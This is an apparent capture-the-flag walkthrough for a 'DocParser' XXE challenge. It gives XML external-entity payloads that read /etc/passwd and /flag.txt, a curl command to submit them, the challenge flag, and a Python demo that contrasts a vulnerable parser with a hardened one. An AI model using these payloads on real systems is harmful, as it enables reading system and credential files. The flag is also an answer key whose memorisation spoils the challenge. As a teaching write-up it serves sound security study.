hackr.gg — Official Walkthrough
Confidential · Educational Use Only

DocParser — XXE Injection

XXE Injection · XML External Entity (XXE)
Difficulty: Intermediate
Vuln class: XML External Entity (XXE)
Steps: 3
// Objective
Inject an XXE payload via the vendor field in the XML document parser to read /etc/passwd.
// Tools required
Burp Suite, curl
// Step-by-step walkthrough
1
Intercept an XML upload request
Upload any document to DocParser and intercept the request in Burp Suite. The body is XML with a <vendor> field whose value you control.
Command / Input
POST /api/parse

<?xml version="1.0"?>
<doc><vendor>ACME Corp</vendor></doc>
2
Inject the XXE entity
Add an external entity declaration in the DOCTYPE and reference it in the vendor field.
Command / Input
<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<doc><vendor>&xxe;</vendor></doc>
When the parser resolves external entities, the &xxe; reference in <vendor> is expanded to the contents of /etc/passwd before the value is processed. You only get to see the result because DocParser reflects the parsed vendor value in its response; without that reflection the read would be blind.
3
Read the flag
The server reflects the parsed vendor value in its response, so the request above returns the contents of /etc/passwd. The flag is stored in /flag.txt; repeat the request with the entity pointed at that path.
Command / Input
<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<doc><vendor>&xxe;</vendor></doc>
Output
HackrGG{xxe_3xt3rn4l_3nt1ty_f1l3_r34d}
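As an added example that is not part of the original walkthrough or of DocParser itself: the Python script below builds the request body from steps 2 and 3 and then runs it through two standard-library expat parsers, one configured to follow SYSTEM entities (modelling the vulnerable server) and one that rejects any DOCTYPE before an entity can be declared (the fix). The target file is a temporary file with constructed contents standing in for /flag.txt; the names xxe_payload, parse_vendor and demo are chosen here and are not DocParser's. No third-party packages are needed.

```python
import os
import tempfile
import xml.parsers.expat as expat


def xxe_payload(path: str) -> bytes:
    """Build the DocParser request body from steps 2/3, pointing the
    external entity at `path` (e.g. "/etc/passwd" or "/flag.txt")."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        "<doc><vendor>&xxe;</vendor></doc>"
    ).encode()


def parse_vendor(body: bytes, resolve_external: bool) -> str:
    """Return the text of <vendor> from a DocParser-style document.

    resolve_external=True models the vulnerable server: expat is given an
    ExternalEntityRefHandler that follows SYSTEM entities, so &xxe; expands
    to the referenced file.  resolve_external=False is the hardened variant:
    any DOCTYPE is rejected, so no entity can be declared at all.
    """
    parser = expat.ParserCreate()
    state = {"in_vendor": False, "text": []}

    def start(name, attrs):
        if name == "vendor":
            state["in_vendor"] = True

    def end(name):
        if name == "vendor":
            state["in_vendor"] = False

    def chars(data):
        if state["in_vendor"]:
            state["text"].append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars

    if resolve_external:
        def external_entity(context, base, system_id, public_id):
            # Vulnerable behaviour: read whatever the SYSTEM identifier names
            # and feed it through a child parser.  The child inherits the
            # handlers above, so the file text lands inside <vendor>.
            if not system_id.startswith("file://"):
                raise ValueError(f"unsupported entity URI: {system_id}")
            with open(system_id[len("file://"):], "rb") as fh:
                data = fh.read()
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(data, True)
            return 1  # non-zero tells expat the entity was handled

        parser.ExternalEntityRefHandler = external_entity
    else:
        def reject_doctype(name, sysid, pubid, has_internal_subset):
            raise ValueError("DOCTYPE is not allowed in uploaded documents")

        parser.StartDoctypeDeclHandler = reject_doctype

    parser.Parse(body, True)
    return "".join(state["text"])


def demo() -> dict:
    """Run the walkthrough's requests against both parsers, using a temp
    file with constructed contents in place of /flag.txt."""
    benign = b'<?xml version="1.0"?>\n<doc><vendor>ACME Corp</vendor></doc>'
    sample = "root:x:0:0:root:/root:/bin/sh\n"  # constructed stand-in contents
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "flag.txt")
        with open(target, "w") as fh:
            fh.write(sample)
        try:
            parse_vendor(xxe_payload(target), resolve_external=False)
            hardened_blocked = False
        except ValueError:
            hardened_blocked = True
        return {
            "benign": parse_vendor(benign, resolve_external=False),
            "leaked": parse_vendor(xxe_payload(target), resolve_external=True),
            "expected": sample,
            "hardened_blocked": hardened_blocked,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

To reproduce against the challenge itself, write xxe_payload("/flag.txt") to a file and POST it with curl, e.g. curl --data-binary @payload.xml http://<target>/api/parse (a Content-Type of application/xml is assumed; check what the intercepted upload actually sends). One caveat the resolver above makes visible: an external general entity has to be well-formed XML text, so a target file containing a bare < or & makes the child parse fail with an ExpatError rather than leaking the file. /etc/passwd and a one-line flag file are both safe in that respect.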
// Flag
Flag value
HackrGG{xxe_3xt3rn4l_3nt1ty_f1l3_r34d}
Contents of /flag.txt returned via the XXE entity reference in the vendor field.